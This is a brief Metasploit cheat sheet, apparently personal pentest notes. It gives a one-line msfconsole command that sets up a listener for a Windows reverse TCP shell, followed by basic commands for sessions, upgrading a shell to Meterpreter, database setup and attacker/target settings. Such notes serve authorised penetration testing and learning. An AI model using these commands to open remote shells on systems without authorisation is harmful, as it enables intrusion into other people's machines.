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2024-08-30 23:07:22 +00:00
## Top Commands
One Liner Meterpreter
msfconsole -q -x "use exploit/multi/handler; set payload windows/shell/reverse_tcp; set LHOST IP; set LPORT PORT;exploit"
msfconsole ---> Start Metasploit
clear ---> Clear chat
help ---> Help info
use (x) ---> Use payload
search ---> Search payload
set ---> Set element in the payload
unset ---> Unset element from the payload
setg ---> Set element (will stay on all payload until closed)
unsetg ---> Remove all element set from the other action
info ---> Check info about the payload
show options ---> Show options you need to set to launch the payload
show payload
set payload
exploit/run ---> Exploit
exploit -z ---> Exploit in background (or type CTRL Z)
sessions ---> Search the sessions
sessions -i ---> Connect to the first session that is enable
background ---> Backgrounds the current session
#Payload (POST)
sessions -u NUMBER ---> Turn Shell into Meterpreter session
systemctl start postgresql
msfdb init
workspace /-h/-a/-d (Help / View / Add / Delete)
help (Different then the normal help when launched with database)
db_nmap -X IP (Launch Nmap)
hosts /-h/ (reach information relevant to hosts and services running on target systems)
Payload Settings
LHOST eth0 (ex) ---> Set Local Host (Attacker)
LPORT ---> Set Local Port (Attacker)
RHOST ---> Set Remote Host (Target)
RPORT ---> Set Remote Port (Target)